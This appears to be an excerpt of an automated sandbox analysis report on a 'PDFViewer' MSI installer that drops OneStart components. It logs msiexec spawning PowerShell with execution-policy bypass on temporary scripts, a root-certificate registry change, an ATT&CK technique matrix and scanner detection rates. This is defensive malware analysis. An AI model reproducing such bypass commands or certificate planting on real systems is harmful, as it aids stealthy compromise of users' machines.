          Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC2FC.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss129F.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss7063.tmp.ps1"
          Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Roaming\BBWC VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Windows\System32\msiexec.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A Blob
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Replication Through Removable Media (1) | Windows Management Instrumentation (1) | Scheduled Task/Job (1) | Process Injection (11) | Masquerading (11) | OS Credential Dumping | Process Discovery (1) | Replication Through Removable Media (1) | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel (2) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job (1) | Registry Run Keys / Startup Folder (21) | Scheduled Task/Job (1) | Modify Registry (1) | LSASS Memory | Virtualization/Sandbox Evasion (21) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol (2) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | PowerShell (1) | DLL Side-Loading (1) | Registry Run Keys / Startup Folder (21) | Disable or Modify Tools (1) | Security Account Manager | Application Window Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | DLL Search Order Hijacking (2) | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (21) | NTDS | Peripheral Device Discovery (11) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | DLL Search Order Hijacking (2) | Process Injection (11) | LSA Secrets | Remote System Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading (1) | Cached Domain Credentials | File and Directory Discovery (2) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Search Order Hijacking (2) | DCSync | System Information Discovery (13) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion (1) | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Source | Detection | Scanner | Label | Link
          PDFViewer_44882564 (1).msi | 3% | ReversingLabs | |
          PDFViewer_44882564 (1).msi | 2% | Virustotal | | Browse
          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Local\Temp\MSI112.tmp | 0% | ReversingLabs | |
          C:\Users\user\AppData\Local\Temp\MSI112.tmp | 0% | Virustotal | | Browse
          C:\Users\user\AppData\Local\Temp\MSI9297.tmp | 0% | ReversingLabs | |
          C:\Users\user\AppData\Local\Temp\MSI9297.tmp | 0% | Virustotal | | Browse
          C:\Users\user\AppData\Roaming\OneStart\bar\DBar.exe | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\DBar.exe | 0% | Virustotal | | Browse
          C:\Users\user\AppData\Roaming\OneStart\bar\DBarCore.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\DBarCore.dll | 0% | Virustotal | | Browse
          C:\Users\user\AppData\Roaming\OneStart\bar\FluentWPF.dll | 0% | ReversingLabs | |
